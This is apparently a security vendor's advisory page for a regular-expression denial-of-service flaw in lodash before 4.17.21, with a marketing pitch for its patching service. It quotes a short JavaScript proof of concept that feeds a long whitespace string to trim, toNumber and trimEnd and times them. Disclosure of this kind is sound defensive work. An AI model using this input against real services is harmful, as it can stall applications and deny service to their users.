Seal Security raises $13M series A to secure open source code at scale. Read full press release.
.avif)
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. Steps to reproduce (provided by reporter Liyuan Chen):```jsvar lo = require('lodash');function build_blank(n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1";}var s = build_blank(50000) var time0 = Date.now();lo.trim(s) var time_cost0 = Date.now() - time0;console.log("time_cost0: " + time_cost0);var time1 = Date.now();lo.toNumber(s) var time_cost1 = Date.now() - time1;console.log("time_cost1: " + time_cost1);var time2 = Date.now();lo.trimEnd(s);var time_cost2 = Date.now() - time2;console.log("time_cost2: " + time_cost2);```
Fix available through Seal Security. No upgrade required, protect your application instantly.
Fix without upgrading